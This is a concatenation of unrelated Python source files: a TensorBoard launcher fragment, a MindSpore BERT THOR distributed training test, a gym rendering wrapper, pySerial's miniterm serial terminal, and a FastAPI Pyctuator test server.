sys.stderr.write('GRTensorBoard %s at %s (Press CTRL+C to quit)\n' %
(VERSION, server.get_url()))
sys.stderr.flush()
server.serve_forever()
return 0
except program.TensorBoardServerException as e:
_logger.log_message_info("Error: " + e.msg)
sys.stderr.write('ERROR: %s\n' % e.msg)
sys.stderr.flush()
return -1
def launch(self):
"""Python API for launching GRTensorBoard.
This method is the same as main() except it launches TensorBoard in
a separate permanent thread. The configure() method must be called
first.
Returns:
The URL of the GRTensorBoard web server.
:rtype: str
"""
# Make it easy to run TensorBoard inside other programs, e.g. Colab.
server = self._make_server()
thread = threading.Thread(target=server.serve_forever, name='GRTensorBoard')
thread.daemon = True
thread.start()
return server.get_url()
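    # Illustrative usage sketch; the constructor arguments and logdir path below are
    # assumptions (they mirror tensorboard.program.TensorBoard), not part of this file:
    #   tb = GRTensorBoard(plugins, assets_zip_provider)
    #   tb.configure(argv=[None, '--logdir', '/tmp/logs'])
    #   url = tb.launch()  # e.g. 'http://localhost:6006/'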
    def _register_info(self, server):
        # Delegate to the base TensorBoard implementation.
        super(GRTensorBoard, self)._register_info(server)
    def _install_signal_handler(self, signal_number, signal_name):
        # Delegate to the base TensorBoard implementation.
        super(GRTensorBoard, self)._install_signal_handler(signal_number, signal_name)
def _make_server(self):
app = gr_tensorboard_wsgi(self.flags, self.plugin_loaders, self.assets_zip_provider)
return self.server_class(app, self.flags)
|
test_bert_thor.py
|
# Copyright 2020-2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""test bert thor performance with 8p on mlperf dataset"""
import os
import time
from multiprocessing import Process, Queue
import pytest
import numpy as np
import mindspore.dataset as ds
import mindspore.common.dtype as mstype
import mindspore.communication.management as D
from mindspore import context
from mindspore import log as logger
from mindspore.train.callback import Callback
from mindspore.context import ParallelMode
from mindspore.train.serialization import load_checkpoint, load_param_into_net
from mindspore.nn.optim import THOR
from mindspore.train.model import Model
from mindspore.train.train_thor import ConvertModelUtils
import mindspore.dataset.transforms.c_transforms as C
from model_zoo.official.nlp.bert.src.bert_for_pre_training import BertNetworkWithLoss, BertTrainOneStepCell
from model_zoo.official.nlp.bert.src.utils import get_bert_thor_lr, get_bert_thor_damping
from model_zoo.official.nlp.bert.src.bert_model import BertConfig
MINDSPORE_HCCL_CONFIG_PATH = "/home/workspace/mindspore_config/hccl/rank_table_8p.json"
DATASET_PATH = "/home/workspace/mindspore_dataset/bert/thor/en-wiki-512_test_first1wan"
load_checkpoint_path = ""
data_sink_steps = 100
train_steps = 200
batch_size = 12
frequency = 100
momentum = 0.9
weight_decay = 5e-4
loss_scale = 1.0
bert_net_cfg = BertConfig(
seq_length=512,
vocab_size=30522,
hidden_size=1024,
num_hidden_layers=4,
num_attention_heads=16,
intermediate_size=4096,
hidden_act="gelu",
hidden_dropout_prob=0.1,
attention_probs_dropout_prob=0.1,
max_position_embeddings=512,
type_vocab_size=2,
initializer_range=0.02,
use_relative_positions=False,
dtype=mstype.float32,
compute_type=mstype.float16
)
np.random.seed(1)
ds.config.set_seed(1)
os.environ['GLOG_v'] = str(2)
class TimeMonitor(Callback):
"""Time Monitor."""
def __init__(self, data_size):
super(TimeMonitor, self).__init__()
self.data_size = data_size
self.epoch_mseconds_list = []
self.per_step_mseconds_list = []
def epoch_begin(self, run_context):
self.epoch_time = time.time()
def epoch_end(self, run_context):
cb_params = run_context.original_args()
epoch_mseconds = (time.time() - self.epoch_time) * 1000
self.epoch_mseconds_list.append(epoch_mseconds)
per_step_mseconds = epoch_mseconds / self.data_size
self.per_step_mseconds_list.append(per_step_mseconds)
print("epoch: {}, per_step_mseconds are {}".format(cb_params.cur_epoch_num, str(per_step_mseconds)), flush=True)
class LossCallback(Callback):
def __init__(self):
super(LossCallback, self).__init__()
self.loss_list = []
def epoch_end(self, run_context):
cb_params = run_context.original_args()
self.loss_list.append(cb_params.net_outputs.asnumpy())
print("epoch: {}, step: {}, outputs are {}".format(cb_params.cur_epoch_num, cb_params.cur_step_num,
str(cb_params.net_outputs)), flush=True)
def create_bert_dataset(device_num=1, rank=0, do_shuffle="true", data_dir=None, schema_dir=None):
"""create train dataset"""
# apply repeat operations
files = os.listdir(data_dir)
data_files = []
for file_name in files:
if "tfrecord" in file_name:
data_files.append(os.path.join(data_dir, file_name))
data_files = sorted(data_files)
data_set = ds.TFRecordDataset(data_files, schema_dir if schema_dir != "" else None,
columns_list=["input_ids", "input_mask", "segment_ids", "next_sentence_labels",
"masked_lm_positions", "masked_lm_ids", "masked_lm_weights"],
shuffle=ds.Shuffle.FILES if do_shuffle == "true" else False,
num_shards=device_num, shard_id=rank, shard_equal_rows=True)
ori_dataset_size = data_set.get_dataset_size()
print('origin dataset size: ', ori_dataset_size)
type_cast_op = C.TypeCast(mstype.int32)
data_set = data_set.map(operations=type_cast_op, input_columns="masked_lm_ids")
data_set = data_set.map(operations=type_cast_op, input_columns="masked_lm_positions")
data_set = data_set.map(operations=type_cast_op, input_columns="next_sentence_labels")
data_set = data_set.map(operations=type_cast_op, input_columns="segment_ids")
data_set = data_set.map(operations=type_cast_op, input_columns="input_mask")
data_set = data_set.map(operations=type_cast_op, input_columns="input_ids")
# apply batch operations
data_set = data_set.batch(batch_size, drop_remainder=True)
logger.info("data size: {}".format(data_set.get_dataset_size()))
logger.info("repeat count: {}".format(data_set.get_repeat_count()))
return data_set
def _set_bert_all_reduce_split():
"""set bert all_reduce fusion split, support num_hidden_layers is 12 and 24."""
context.set_auto_parallel_context(all_reduce_fusion_config=[38, 77])
def train_process_bert_thor(q, device_id, epoch_size, device_num):
os.system("mkdir " + str(device_id))
os.chdir(str(device_id))
context.set_context(mode=context.GRAPH_MODE, device_target="Ascend", device_id=device_id, save_graphs=False)
context.set_context(reserve_class_name_in_scope=False)
context.set_context(max_call_depth=3000)
os.environ['MINDSPORE_HCCL_CONFIG_PATH'] = MINDSPORE_HCCL_CONFIG_PATH
os.environ['RANK_ID'] = str(device_id)
os.environ['RANK_SIZE'] = str(device_num)
D.init()
rank = device_id % device_num
context.reset_auto_parallel_context()
_set_bert_all_reduce_split()
context.set_auto_parallel_context(parallel_mode=ParallelMode.DATA_PARALLEL, gradients_mean=True,
device_num=device_num)
data_set = create_bert_dataset(device_num=device_num, rank=rank, do_shuffle=False, data_dir=DATASET_PATH,
schema_dir=None)
net_with_loss = BertNetworkWithLoss(bert_net_cfg, True)
new_repeat_count = epoch_size * data_set.get_dataset_size() // data_sink_steps
new_repeat_count = min(new_repeat_count, train_steps // data_sink_steps)
lr = get_bert_thor_lr()
damping = get_bert_thor_damping()
split_indices = [38, 77]
optimizer = THOR(net_with_loss, lr, damping, momentum, weight_decay, loss_scale, batch_size,
decay_filter=lambda x: 'layernorm' not in x.name.lower() and 'bias' not in x.name.lower(),
split_indices=split_indices)
time_monitor_callback = TimeMonitor(data_sink_steps)
loss_callback = LossCallback()
callback = [time_monitor_callback, loss_callback]
if load_checkpoint_path:
param_dict = load_checkpoint(load_checkpoint_path)
load_param_into_net(net_with_loss, param_dict)
net_with_grads = BertTrainOneStepCell(net_with_loss, optimizer=optimizer)
model = Model(net_with_grads)
model = ConvertModelUtils().convert_to_thor_model(model, network=net_with_grads, optimizer=optimizer,
frequency=frequency)
model.train(new_repeat_count, data_set, callbacks=callback, dataset_sink_mode=True, sink_size=data_sink_steps)
loss_list = loss_callback.loss_list
per_step_mseconds = time_monitor_callback.per_step_mseconds_list
q.put({'loss': loss_list, 'cost': per_step_mseconds})
@pytest.mark.level0
@pytest.mark.platform_arm_ascend_training
@pytest.mark.platform_x86_ascend_training
@pytest.mark.env_single
def test_bert_thor_8p():
"""test bert thor mlperf 8p"""
q = Queue()
device_num = 8
epoch_size = 2
process = []
for i in range(device_num):
device_id = i
process.append(Process(target=train_process_bert_thor, args=(q, device_id, epoch_size, device_num)))
for i in range(device_num):
process[i].start()
print("Waiting for all subprocesses done...")
for i in range(device_num):
process[i].join()
sum_loss_list = []
sum_cost_list = []
for _ in range(train_steps // data_sink_steps):
sum_loss_list.append(0.0)
sum_cost_list.append(0.0)
for _ in range(device_num):
output = q.get()
loss_list = output['loss']
cost_list = output['cost']
sum_loss_list = np.sum([loss_list, sum_loss_list], axis=0)
sum_cost_list = np.sum([cost_list, sum_cost_list], axis=0)
for j in range(train_steps // data_sink_steps):
print("epoch: ", j, "sum_loss: ", sum_loss_list[j], "sum_cost: ", sum_cost_list[j])
mean_loss = sum_loss_list[-1] / device_num
mean_cost = sum_cost_list[-1] / device_num
for i in range(device_num):
os.system("rm -rf " + str(i))
print("End training...")
assert mean_cost < 69
assert mean_loss < 8.125
if __name__ == '__main__':
begin = time.time()
test_bert_thor_8p()
end = time.time()
print("time span is", end - begin, flush=True)
|
render_observation.py
|
import gym
import cv2
import multiprocessing as mp
import os
import numpy as np
def _render(img):
img = cv2.cvtColor(np.asarray(img), cv2.COLOR_BGR2RGB)
cv2.imshow(str(os.getpid()) + "_render", img)
cv2.waitKey(1)
def _async_callback(q: mp.Queue):
while True:
img = q.get()
_render(img)
class RenderObservation(gym.Wrapper):
"""
Renders the observation as an image
"""
def __init__(self, env: gym.Env, asynch=True):
super(RenderObservation, self).__init__(env)
assert isinstance(env.observation_space, gym.spaces.Box)
self.asynch = asynch
self.last_obs = env.observation_space.sample()
if asynch:
self.frame_q = mp.Queue(maxsize=3)
self.render_proc = mp.Process(target=_async_callback, args=(self.frame_q,))
self.render_proc.start()
def reset(self, **kwargs):
        obs = super(RenderObservation, self).reset(**kwargs)
self.last_obs = obs
return obs
def step(self, action):
tup = super(RenderObservation, self).step(action)
self.last_obs = tup[0]
return tup
def render(self, mode="human", **kwargs):
if self.asynch:
if not self.frame_q.full():
self.frame_q.put_nowait(self.last_obs)
else:
_render(self.last_obs)
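# Illustrative usage sketch (the environment id and call pattern are assumptions,
# not part of this module): wrap an image-observation env and call render() per step.
#   env = RenderObservation(gym.make("PongNoFrameskip-v4"), asynch=False)
#   obs = env.reset()
#   obs, reward, done, info = env.step(env.action_space.sample())
#   env.render()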
|
miniterm.py
|
#!C:\Python27\pythonw.exe
# Very simple serial terminal
# (C)2002-2011 Chris Liechti <[email protected]>
# Input characters are sent directly (only LF -> CR/LF/CRLF translation is
# done), received characters are displayed as is (or escaped through Python's
# repr, useful for debug purposes)
import sys, os, serial, threading
try:
from serial.tools.list_ports import comports
except ImportError:
comports = None
EXITCHARCTER = serial.to_bytes([0x1d]) # GS/CTRL+]
MENUCHARACTER = serial.to_bytes([0x14]) # Menu: CTRL+T
DEFAULT_PORT = None
DEFAULT_BAUDRATE = 9600
DEFAULT_RTS = None
DEFAULT_DTR = None
def key_description(character):
"""generate a readable description for a key"""
ascii_code = ord(character)
if ascii_code < 32:
return 'Ctrl+%c' % (ord('@') + ascii_code)
else:
return repr(character)
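# For example, key_description(EXITCHARCTER) returns 'Ctrl+]' and
# key_description(MENUCHARACTER) returns 'Ctrl+T'.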
# help text, starts with blank line! it's a function so that the current values
# for the shortcut keys are used and not the values at program start
def get_help_text():
return """
--- pySerial (%(version)s) - miniterm - help
---
--- %(exit)-8s Exit program
--- %(menu)-8s Menu escape key, followed by:
--- Menu keys:
--- %(itself)-7s Send the menu character itself to remote
--- %(exchar)-7s Send the exit character itself to remote
--- %(info)-7s Show info
--- %(upload)-7s Upload file (prompt will be shown)
--- Toggles:
--- %(rts)-7s RTS %(echo)-7s local echo
--- %(dtr)-7s DTR %(break)-7s BREAK
--- %(lfm)-7s line feed %(repr)-7s Cycle repr mode
---
--- Port settings (%(menu)s followed by the following):
--- p change port
--- 7 8 set data bits
--- n e o s m change parity (None, Even, Odd, Space, Mark)
--- 1 2 3 set stop bits (1, 2, 1.5)
--- b change baud rate
--- x X disable/enable software flow control
--- r R disable/enable hardware flow control
""" % {
'version': getattr(serial, 'VERSION', 'unknown version'),
'exit': key_description(EXITCHARCTER),
'menu': key_description(MENUCHARACTER),
'rts': key_description('\x12'),
'repr': key_description('\x01'),
'dtr': key_description('\x04'),
'lfm': key_description('\x0c'),
'break': key_description('\x02'),
'echo': key_description('\x05'),
'info': key_description('\x09'),
'upload': key_description('\x15'),
'itself': key_description(MENUCHARACTER),
'exchar': key_description(EXITCHARCTER),
}
if sys.version_info >= (3, 0):
def character(b):
return b.decode('latin1')
else:
def character(b):
return b
LF = serial.to_bytes([10])
CR = serial.to_bytes([13])
CRLF = serial.to_bytes([13, 10])
X00 = serial.to_bytes([0])
X0E = serial.to_bytes([0x0e])
# first choose a platform dependent way to read single characters from the console
global console
if os.name == 'nt':
import msvcrt
class Console(object):
def __init__(self):
pass
def setup(self):
pass # Do nothing for 'nt'
def cleanup(self):
pass # Do nothing for 'nt'
def getkey(self):
while True:
z = msvcrt.getch()
if z == X00 or z == X0E: # functions keys, ignore
msvcrt.getch()
else:
if z == CR:
return LF
return z
console = Console()
elif os.name == 'posix':
import termios, sys, os
class Console(object):
def __init__(self):
self.fd = sys.stdin.fileno()
self.old = None
def setup(self):
self.old = termios.tcgetattr(self.fd)
new = termios.tcgetattr(self.fd)
new[3] = new[3] & ~termios.ICANON & ~termios.ECHO & ~termios.ISIG
new[6][termios.VMIN] = 1
new[6][termios.VTIME] = 0
termios.tcsetattr(self.fd, termios.TCSANOW, new)
def getkey(self):
c = os.read(self.fd, 1)
return c
def cleanup(self):
if self.old is not None:
termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.old)
console = Console()
def cleanup_console():
console.cleanup()
sys.exitfunc = cleanup_console # terminal modes have to be restored on exit...
else:
raise NotImplementedError("Sorry no implementation for your platform (%s) available." % sys.platform)
def dump_port_list():
if comports:
sys.stderr.write('\n--- Available ports:\n')
for port, desc, hwid in sorted(comports()):
#~ sys.stderr.write('--- %-20s %s [%s]\n' % (port, desc, hwid))
sys.stderr.write('--- %-20s %s\n' % (port, desc))
CONVERT_CRLF = 2
CONVERT_CR = 1
CONVERT_LF = 0
NEWLINE_CONVERISON_MAP = (LF, CR, CRLF)
LF_MODES = ('LF', 'CR', 'CR/LF')
REPR_MODES = ('raw', 'some control', 'all control', 'hex')
class Miniterm(object):
def __init__(self, port, baudrate, parity, rtscts, xonxoff, echo=False, convert_outgoing=CONVERT_CRLF, repr_mode=0):
try:
self.serial = serial.serial_for_url(port, baudrate, parity=parity, rtscts=rtscts, xonxoff=xonxoff, timeout=1)
except AttributeError:
# happens when the installed pyserial is older than 2.5. use the
# Serial class directly then.
self.serial = serial.Serial(port, baudrate, parity=parity, rtscts=rtscts, xonxoff=xonxoff, timeout=1)
self.echo = echo
self.repr_mode = repr_mode
self.convert_outgoing = convert_outgoing
self.newline = NEWLINE_CONVERISON_MAP[self.convert_outgoing]
self.dtr_state = True
self.rts_state = True
self.break_state = False
def _start_reader(self):
"""Start reader thread"""
self._reader_alive = True
# start serial->console thread
self.receiver_thread = threading.Thread(target=self.reader)
self.receiver_thread.setDaemon(True)
self.receiver_thread.start()
def _stop_reader(self):
"""Stop reader thread only, wait for clean exit of thread"""
self._reader_alive = False
self.receiver_thread.join()
def start(self):
self.alive = True
self._start_reader()
# enter console->serial loop
self.transmitter_thread = threading.Thread(target=self.writer)
self.transmitter_thread.setDaemon(True)
self.transmitter_thread.start()
def stop(self):
self.alive = False
def join(self, transmit_only=False):
self.transmitter_thread.join()
if not transmit_only:
self.receiver_thread.join()
def dump_port_settings(self):
sys.stderr.write("\n--- Settings: %s %s,%s,%s,%s\n" % (
self.serial.portstr,
self.serial.baudrate,
self.serial.bytesize,
self.serial.parity,
self.serial.stopbits))
sys.stderr.write('--- RTS: %-8s DTR: %-8s BREAK: %-8s\n' % (
(self.rts_state and 'active' or 'inactive'),
(self.dtr_state and 'active' or 'inactive'),
(self.break_state and 'active' or 'inactive')))
try:
sys.stderr.write('--- CTS: %-8s DSR: %-8s RI: %-8s CD: %-8s\n' % (
(self.serial.getCTS() and 'active' or 'inactive'),
(self.serial.getDSR() and 'active' or 'inactive'),
(self.serial.getRI() and 'active' or 'inactive'),
(self.serial.getCD() and 'active' or 'inactive')))
except serial.SerialException:
            # on RFC 2217 ports it can happen that no modem state notification has
            # been received yet. ignore this error.
pass
sys.stderr.write('--- software flow control: %s\n' % (self.serial.xonxoff and 'active' or 'inactive'))
sys.stderr.write('--- hardware flow control: %s\n' % (self.serial.rtscts and 'active' or 'inactive'))
sys.stderr.write('--- data escaping: %s linefeed: %s\n' % (
REPR_MODES[self.repr_mode],
LF_MODES[self.convert_outgoing]))
def reader(self):
"""loop and copy serial->console"""
try:
while self.alive and self._reader_alive:
data = character(self.serial.read(1))
if self.repr_mode == 0:
# direct output, just have to care about newline setting
if data == '\r' and self.convert_outgoing == CONVERT_CR:
sys.stdout.write('\n')
else:
sys.stdout.write(data)
elif self.repr_mode == 1:
# escape non-printable, let pass newlines
if self.convert_outgoing == CONVERT_CRLF and data in '\r\n':
if data == '\n':
sys.stdout.write('\n')
elif data == '\r':
pass
elif data == '\n' and self.convert_outgoing == CONVERT_LF:
sys.stdout.write('\n')
elif data == '\r' and self.convert_outgoing == CONVERT_CR:
sys.stdout.write('\n')
else:
sys.stdout.write(repr(data)[1:-1])
elif self.repr_mode == 2:
# escape all non-printable, including newline
sys.stdout.write(repr(data)[1:-1])
elif self.repr_mode == 3:
# escape everything (hexdump)
for c in data:
sys.stdout.write("%s " % c.encode('hex'))
sys.stdout.flush()
except serial.SerialException, e:
self.alive = False
            # would be nice if the console reader could be interrupted at this
# point...
raise
def writer(self):
"""\
Loop and copy console->serial until EXITCHARCTER character is
found. When MENUCHARACTER is found, interpret the next key
locally.
"""
menu_active = False
try:
while self.alive:
try:
b = console.getkey()
except KeyboardInterrupt:
b = serial.to_bytes([3])
c = character(b)
if menu_active:
if c == MENUCHARACTER or c == EXITCHARCTER: # Menu character again/exit char -> send itself
self.serial.write(b) # send character
if self.echo:
sys.stdout.write(c)
elif c == '\x15': # CTRL+U -> upload file
sys.stderr.write('\n--- File to upload: ')
sys.stderr.flush()
console.cleanup()
filename = sys.stdin.readline().rstrip('\r\n')
if filename:
try:
file = open(filename, 'r')
sys.stderr.write('--- Sending file %s ---\n' % filename)
while True:
line = file.readline().rstrip('\r\n')
if not line:
break
self.serial.write(line)
self.serial.write('\r\n')
# Wait for output buffer to drain.
self.serial.flush()
sys.stderr.write('.') # Progress indicator.
sys.stderr.write('\n--- File %s sent ---\n' % filename)
except IOError, e:
sys.stderr.write('--- ERROR opening file %s: %s ---\n' % (filename, e))
console.setup()
elif c in '\x08hH?': # CTRL+H, h, H, ? -> Show help
sys.stderr.write(get_help_text())
elif c == '\x12': # CTRL+R -> Toggle RTS
self.rts_state = not self.rts_state
self.serial.setRTS(self.rts_state)
sys.stderr.write('--- RTS %s ---\n' % (self.rts_state and 'active' or 'inactive'))
elif c == '\x04': # CTRL+D -> Toggle DTR
self.dtr_state = not self.dtr_state
self.serial.setDTR(self.dtr_state)
sys.stderr.write('--- DTR %s ---\n' % (self.dtr_state and 'active' or 'inactive'))
elif c == '\x02': # CTRL+B -> toggle BREAK condition
self.break_state = not self.break_state
self.serial.setBreak(self.break_state)
sys.stderr.write('--- BREAK %s ---\n' % (self.break_state and 'active' or 'inactive'))
elif c == '\x05': # CTRL+E -> toggle local echo
self.echo = not self.echo
sys.stderr.write('--- local echo %s ---\n' % (self.echo and 'active' or 'inactive'))
elif c == '\x09': # CTRL+I -> info
self.dump_port_settings()
elif c == '\x01': # CTRL+A -> cycle escape mode
self.repr_mode += 1
if self.repr_mode > 3:
self.repr_mode = 0
sys.stderr.write('--- escape data: %s ---\n' % (
REPR_MODES[self.repr_mode],
))
elif c == '\x0c': # CTRL+L -> cycle linefeed mode
self.convert_outgoing += 1
if self.convert_outgoing > 2:
self.convert_outgoing = 0
self.newline = NEWLINE_CONVERISON_MAP[self.convert_outgoing]
sys.stderr.write('--- line feed %s ---\n' % (
LF_MODES[self.convert_outgoing],
))
elif c in 'pP': # P -> change port
dump_port_list()
sys.stderr.write('--- Enter port name: ')
sys.stderr.flush()
console.cleanup()
try:
port = sys.stdin.readline().strip()
except KeyboardInterrupt:
port = None
console.setup()
if port and port != self.serial.port:
# reader thread needs to be shut down
self._stop_reader()
# save settings
settings = self.serial.getSettingsDict()
try:
try:
new_serial = serial.serial_for_url(port, do_not_open=True)
except AttributeError:
# happens when the installed pyserial is older than 2.5. use the
# Serial class directly then.
new_serial = serial.Serial()
new_serial.port = port
# restore settings and open
new_serial.applySettingsDict(settings)
new_serial.open()
new_serial.setRTS(self.rts_state)
new_serial.setDTR(self.dtr_state)
new_serial.setBreak(self.break_state)
except Exception, e:
sys.stderr.write('--- ERROR opening new port: %s ---\n' % (e,))
new_serial.close()
else:
self.serial.close()
self.serial = new_serial
sys.stderr.write('--- Port changed to: %s ---\n' % (self.serial.port,))
# and restart the reader thread
self._start_reader()
elif c in 'bB': # B -> change baudrate
sys.stderr.write('\n--- Baudrate: ')
sys.stderr.flush()
console.cleanup()
backup = self.serial.baudrate
try:
self.serial.baudrate = int(sys.stdin.readline().strip())
except ValueError, e:
sys.stderr.write('--- ERROR setting baudrate: %s ---\n' % (e,))
self.serial.baudrate = backup
else:
self.dump_port_settings()
console.setup()
elif c == '8': # 8 -> change to 8 bits
self.serial.bytesize = serial.EIGHTBITS
self.dump_port_settings()
elif c == '7': # 7 -> change to 8 bits
self.serial.bytesize = serial.SEVENBITS
self.dump_port_settings()
elif c in 'eE': # E -> change to even parity
self.serial.parity = serial.PARITY_EVEN
self.dump_port_settings()
elif c in 'oO': # O -> change to odd parity
self.serial.parity = serial.PARITY_ODD
self.dump_port_settings()
elif c in 'mM': # M -> change to mark parity
self.serial.parity = serial.PARITY_MARK
self.dump_port_settings()
elif c in 'sS': # S -> change to space parity
self.serial.parity = serial.PARITY_SPACE
self.dump_port_settings()
elif c in 'nN': # N -> change to no parity
self.serial.parity = serial.PARITY_NONE
self.dump_port_settings()
elif c == '1': # 1 -> change to 1 stop bits
self.serial.stopbits = serial.STOPBITS_ONE
self.dump_port_settings()
elif c == '2': # 2 -> change to 2 stop bits
self.serial.stopbits = serial.STOPBITS_TWO
self.dump_port_settings()
elif c == '3': # 3 -> change to 1.5 stop bits
self.serial.stopbits = serial.STOPBITS_ONE_POINT_FIVE
self.dump_port_settings()
elif c in 'xX': # X -> change software flow control
self.serial.xonxoff = (c == 'X')
self.dump_port_settings()
elif c in 'rR': # R -> change hardware flow control
self.serial.rtscts = (c == 'R')
self.dump_port_settings()
else:
sys.stderr.write('--- unknown menu character %s --\n' % key_description(c))
menu_active = False
elif c == MENUCHARACTER: # next char will be for menu
menu_active = True
elif c == EXITCHARCTER:
self.stop()
break # exit app
elif c == '\n':
self.serial.write(self.newline) # send newline character(s)
if self.echo:
sys.stdout.write(c) # local echo is a real newline in any case
sys.stdout.flush()
else:
self.serial.write(b) # send byte
if self.echo:
sys.stdout.write(c)
sys.stdout.flush()
except:
self.alive = False
raise
def main():
import optparse
parser = optparse.OptionParser(
usage = "%prog [options] [port [baudrate]]",
description = "Miniterm - A simple terminal program for the serial port."
)
group = optparse.OptionGroup(parser, "Port settings")
group.add_option("-p", "--port",
dest = "port",
help = "port, a number or a device name. (deprecated option, use parameter instead)",
default = DEFAULT_PORT
)
group.add_option("-b", "--baud",
dest = "baudrate",
action = "store",
type = 'int',
help = "set baud rate, default %default",
default = DEFAULT_BAUDRATE
)
group.add_option("--parity",
dest = "parity",
action = "store",
help = "set parity, one of [N, E, O, S, M], default=N",
default = 'N'
)
group.add_option("--rtscts",
dest = "rtscts",
action = "store_true",
help = "enable RTS/CTS flow control (default off)",
default = False
)
group.add_option("--xonxoff",
dest = "xonxoff",
action = "store_true",
help = "enable software flow control (default off)",
default = False
)
group.add_option("--rts",
dest = "rts_state",
action = "store",
type = 'int',
help = "set initial RTS line state (possible values: 0, 1)",
default = DEFAULT_RTS
)
group.add_option("--dtr",
dest = "dtr_state",
action = "store",
type = 'int',
help = "set initial DTR line state (possible values: 0, 1)",
default = DEFAULT_DTR
)
parser.add_option_group(group)
group = optparse.OptionGroup(parser, "Data handling")
group.add_option("-e", "--echo",
dest = "echo",
action = "store_true",
help = "enable local echo (default off)",
default = False
)
group.add_option("--cr",
dest = "cr",
action = "store_true",
help = "do not send CR+LF, send CR only",
default = False
)
group.add_option("--lf",
dest = "lf",
action = "store_true",
help = "do not send CR+LF, send LF only",
default = False
)
group.add_option("-D", "--debug",
dest = "repr_mode",
action = "count",
help = """debug received data (escape non-printable chars)
--debug can be given multiple times:
0: just print what is received
        1: escape non-printable characters, do newlines as usual
2: escape non-printable characters, newlines too
3: hex dump everything""",
default = 0
)
parser.add_option_group(group)
group = optparse.OptionGroup(parser, "Hotkeys")
group.add_option("--exit-char",
dest = "exit_char",
action = "store",
type = 'int',
help = "ASCII code of special character that is used to exit the application",
default = 0x1d
)
group.add_option("--menu-char",
dest = "menu_char",
action = "store",
type = 'int',
help = "ASCII code of special character that is used to control miniterm (menu)",
default = 0x14
)
parser.add_option_group(group)
group = optparse.OptionGroup(parser, "Diagnostics")
group.add_option("-q", "--quiet",
dest = "quiet",
action = "store_true",
help = "suppress non-error messages",
default = False
)
parser.add_option_group(group)
(options, args) = parser.parse_args()
options.parity = options.parity.upper()
if options.parity not in 'NEOSM':
parser.error("invalid parity")
if options.cr and options.lf:
parser.error("only one of --cr or --lf can be specified")
if options.menu_char == options.exit_char:
parser.error('--exit-char can not be the same as --menu-char')
global EXITCHARCTER, MENUCHARACTER
EXITCHARCTER = chr(options.exit_char)
MENUCHARACTER = chr(options.menu_char)
port = options.port
baudrate = options.baudrate
if args:
if options.port is not None:
parser.error("no arguments are allowed, options only when --port is given")
port = args.pop(0)
if args:
try:
baudrate = int(args[0])
except ValueError:
parser.error("baud rate must be a number, not %r" % args[0])
args.pop(0)
if args:
parser.error("too many arguments")
else:
        # no port given on command line -> ask user now
if port is None:
dump_port_list()
port = raw_input('Enter port name:')
convert_outgoing = CONVERT_CRLF
if options.cr:
convert_outgoing = CONVERT_CR
elif options.lf:
convert_outgoing = CONVERT_LF
try:
miniterm = Miniterm(
port,
baudrate,
options.parity,
rtscts=options.rtscts,
xonxoff=options.xonxoff,
echo=options.echo,
convert_outgoing=convert_outgoing,
repr_mode=options.repr_mode,
)
except serial.SerialException, e:
sys.stderr.write("could not open port %r: %s\n" % (port, e))
sys.exit(1)
if not options.quiet:
sys.stderr.write('--- Miniterm on %s: %d,%s,%s,%s ---\n' % (
miniterm.serial.portstr,
miniterm.serial.baudrate,
miniterm.serial.bytesize,
miniterm.serial.parity,
miniterm.serial.stopbits,
))
sys.stderr.write('--- Quit: %s | Menu: %s | Help: %s followed by %s ---\n' % (
key_description(EXITCHARCTER),
key_description(MENUCHARACTER),
key_description(MENUCHARACTER),
key_description('\x08'),
))
if options.dtr_state is not None:
if not options.quiet:
sys.stderr.write('--- forcing DTR %s\n' % (options.dtr_state and 'active' or 'inactive'))
miniterm.serial.setDTR(options.dtr_state)
miniterm.dtr_state = options.dtr_state
if options.rts_state is not None:
if not options.quiet:
sys.stderr.write('--- forcing RTS %s\n' % (options.rts_state and 'active' or 'inactive'))
miniterm.serial.setRTS(options.rts_state)
miniterm.rts_state = options.rts_state
console.setup()
miniterm.start()
try:
miniterm.join(True)
except KeyboardInterrupt:
pass
if not options.quiet:
sys.stderr.write("\n--- exit ---\n")
miniterm.join()
#~ console.cleanup()
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
if __name__ == '__main__':
main()
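# Example invocations (a sketch; the port names and baud rates below are
# assumptions, adjust them for your system):
#   python miniterm.py /dev/ttyUSB0 115200
#   python miniterm.py --port=COM3 --baud=9600 --echo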
|
fast_api_test_server.py
|
import logging
import threading
import time
from typing import Optional
from fastapi import FastAPI
from starlette.requests import Request
from starlette.responses import Response
from uvicorn.config import Config
from pyctuator.pyctuator import Pyctuator
from tests.conftest import PyctuatorServer, CustomServer
class FastApiPyctuatorServer(PyctuatorServer):
def __init__(self) -> None:
self.app = FastAPI(
title="FastAPI Example Server",
description="Demonstrate Spring Boot Admin Integration with FastAPI",
docs_url="/api",
)
self.pyctuator = Pyctuator(
self.app,
"FastAPI Pyctuator",
"http://localhost:8000",
"http://localhost:8000/pyctuator",
"http://localhost:8001/register",
registration_interval_sec=1,
)
@self.app.get("/logfile_test_repeater", tags=["pyctuator"])
# pylint: disable=unused-variable
def logfile_test_repeater(repeated_string: str) -> str:
logging.error(repeated_string)
return repeated_string
self.server = CustomServer(config=(Config(app=self.app, loop="asyncio")))
self.thread = threading.Thread(target=self.server.run)
@self.app.get("/httptrace_test_url")
# pylint: disable=unused-variable
def get_httptrace_test_url(request: Request, sleep_sec: Optional[int]) -> Response:
# Sleep if requested to sleep - used for asserting httptraces timing
if sleep_sec:
logging.info("Sleeping %s seconds before replying", sleep_sec)
time.sleep(sleep_sec)
# Echo 'User-Data' header as 'resp-data' - used for asserting headers are captured properly
return Response(headers={"resp-data": str(request.headers.get("User-Data"))}, content="my content")
def start(self) -> None:
self.thread.start()
while not self.server.started:
time.sleep(0.01)
def stop(self) -> None:
logging.info("Stopping FastAPI server")
self.pyctuator.stop()
# Allow the recurring registration to complete any in-progress request before stopping FastAPI
time.sleep(1)
self.server.should_exit = True
self.server.force_exit = True
self.thread.join()
logging.info("FastAPI server stopped")
def atexit(self) -> None:
if self.pyctuator.boot_admin_registration_handler:
self.pyctuator.boot_admin_registration_handler.deregister_from_admin_server()
|
validate.py
|
